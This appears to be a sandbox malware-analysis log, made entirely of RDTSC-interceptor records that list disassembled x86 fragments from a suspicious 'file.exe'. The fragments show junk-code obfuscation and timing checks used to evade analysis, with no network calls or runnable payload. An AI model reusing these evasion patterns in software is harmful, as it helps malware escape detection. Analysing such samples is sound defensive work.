Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C3DD second address: D8C3F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70F0BCDB0Dh 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C3F7 second address: D8C41F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 jmp 00007F70F070E5D0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C804 second address: D8C808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C808 second address: D8C81D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CB03 second address: D8CB0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CB0B second address: D8CB2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jg 00007F70F070E5C6h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e jnl 00007F70F070E5C8h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jc 00007F70F070E5C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CB2E second address: D8CB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CB33 second address: D8CB38 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FCCD second address: D8FCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F0BCDB0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FCDD second address: D8FCFB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F70F070E5CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jc 00007F70F070E5C6h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FCFB second address: D8FD03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91A5C second address: D91A61 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91AF2 second address: D91B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F70F0BCDB17h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B19 second address: D91B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B20 second address: D91B40 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F70F0BCDB13h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B40 second address: D91B70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70F070E5D9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B70 second address: D91B8C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F70F0BCDB0Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B8C second address: D91BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9201F second address: D92023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92023 second address: D92035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jp 00007F70F070E5C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92190 second address: D921B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D921B4 second address: D921B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D921B8 second address: D921BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D921BC second address: D921C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92690 second address: D926E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F70F0BCDB0Bh 0x0000000f jmp 00007F70F0BCDB19h 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F70F0BCDB19h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D927A0 second address: D927A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92957 second address: D9295D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92C1C second address: D92C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92C20 second address: D92C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92C2B second address: D92C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 popad 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F70F070E5C8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D2D5Dh] 0x00000032 mov edi, dword ptr [ebp+122D2C05h] 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F70F070E5CAh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93A5F second address: D93A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F70F0BCDB0Bh 0x00000011 jo 00007F70F0BCDB0Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93A7E second address: D93AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007F70F070E5C8h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000017h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 jp 00007F70F070E5C7h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007F70F070E5C8h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov esi, dword ptr [ebp+122D2E84h] 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b pushad 0x0000004c js 00007F70F070E5C6h 0x00000052 push edx 0x00000053 pop esi 0x00000054 popad 0x00000055 pop esi 0x00000056 xchg eax, ebx 0x00000057 jnp 00007F70F070E5CCh 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96003 second address: D96038 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jg 00007F70F0BCDB10h 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D38D0h], edx 0x00000017 push 00000000h 0x00000019 jg 00007F70F0BCDB0Ch 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push edi 0x00000024 pop edi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9687B second address: D9687F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9809D second address: D980A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D980A1 second address: D980ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F70F070E5C8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 add dword ptr [ebp+124843FBh], edi 0x0000002c push 00000000h 0x0000002e jmp 00007F70F070E5D1h 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D980ED second address: D980F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D980F3 second address: D980F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D980F7 second address: D98117 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70F0BCDB15h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9C770 second address: D9C774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B960 second address: D9B964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D78A second address: D9D830 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F70F070E5CCh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F70F070E5C8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F70F070E5C8h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 movzx ebx, cx 0x00000049 push 00000000h 0x0000004b mov edi, dword ptr [ebp+122D1C19h] 0x00000051 mov ebx, 3D2AA4E7h 0x00000056 xchg eax, esi 0x00000057 js 00007F70F070E5D9h 0x0000005d push edi 0x0000005e jmp 00007F70F070E5D1h 0x00000063 pop edi 0x00000064 push eax 0x00000065 pushad 0x00000066 push esi 0x00000067 push edi 0x00000068 pop edi 0x00000069 pop esi 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F70F070E5D0h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DA11 second address: D9DA2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E920 second address: D9E98E instructions: 0x00000000 rdtsc 0x00000002 je 00007F70F070E5C8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sub ebx, 23179EF6h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c jng 00007F70F070E5CBh 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 mov di, A832h 0x0000002d mov eax, dword ptr [ebp+122D0439h] 0x00000033 mov ebx, 0023935Ah 0x00000038 push FFFFFFFFh 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007F70F070E5C8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 jbe 00007F70F070E5C6h 0x0000005e push ecx 0x0000005f pop ecx 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DA2C second address: D9DA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA075D second address: DA076F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F95B second address: D9F9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F70F0BCDB08h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+122D2CB9h] 0x00000029 mov ebx, esi 0x0000002b push dword ptr fs:[00000000h] 0x00000032 pushad 0x00000033 mov dword ptr [ebp+1244DC56h], ebx 0x00000039 popad 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007F70F0BCDB08h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 00000015h 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b mov eax, dword ptr [ebp+122D160Dh] 0x00000061 pushad 0x00000062 movzx eax, si 0x00000065 mov edx, ecx 0x00000067 popad 0x00000068 push FFFFFFFFh 0x0000006a sub dword ptr [ebp+122D307Eh], ecx 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F9E0 second address: D9F9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F9E4 second address: D9F9E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F9E8 second address: D9F9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F9EE second address: D9F9F8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F70F0BCDB0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA167C second address: DA1685 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1685 second address: DA168B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA168B second address: DA1697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1697 second address: DA169B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43E5C second address: D43E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F70F070E5D3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA18E4 second address: DA18EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3E68 second address: DA3E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3E6C second address: DA3EB1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F70F0BCDB08h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov edi, 6A9E777Ah 0x00000027 push 00000000h 0x00000029 mov bl, al 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D311Eh], ecx 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jno 00007F70F0BCDB0Ch 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3EB1 second address: DA3EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3EB7 second address: DA3EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3EBB second address: DA3EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3FC4 second address: DA3FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3FD5 second address: DA4071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e movsx edi, bx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov bx, 1B47h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007F70F070E5C8h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 00000014h 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d xor edi, dword ptr [ebp+122D5837h] 0x00000043 mov eax, dword ptr [ebp+122D0B0Dh] 0x00000049 push 00000000h 0x0000004b push edi 0x0000004c call 00007F70F070E5C8h 0x00000051 pop edi 0x00000052 mov dword ptr [esp+04h], edi 0x00000056 add dword ptr [esp+04h], 00000016h 0x0000005e inc edi 0x0000005f push edi 0x00000060 ret 0x00000061 pop edi 0x00000062 ret 0x00000063 sub ebx, dword ptr [ebp+122D2D49h] 0x00000069 pushad 0x0000006a mov edi, 3C9E7304h 0x0000006f mov di, 319Ch 0x00000073 popad 0x00000074 push FFFFFFFFh 0x00000076 mov ebx, 5694AD65h 0x0000007b nop 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f jp 00007F70F070E5C6h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4071 second address: DA4075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA91B0 second address: DA91B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA833E second address: DA8348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F70F0BCDB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC3C4 second address: DAC466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F70F070E5C8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 jmp 00007F70F070E5D7h 0x0000002c push 00000000h 0x0000002e jmp 00007F70F070E5D0h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F70F070E5C8h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f and ebx, dword ptr [ebp+122D3147h] 0x00000055 mov ebx, dword ptr [ebp+122D2BA9h] 0x0000005b xchg eax, esi 0x0000005c jmp 00007F70F070E5CDh 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jnp 00007F70F070E5CCh 0x0000006a jp 00007F70F070E5C6h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA59B second address: DAA5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jo 00007F70F0BCDB27h 0x0000000f pushad 0x00000010 jmp 00007F70F0BCDB19h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB53B second address: DAB53F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB53F second address: DAB543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB543 second address: DAB549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EEE2 second address: D3EEEC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EEEC second address: D3EEFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CBh 0x00000009 rdtsc
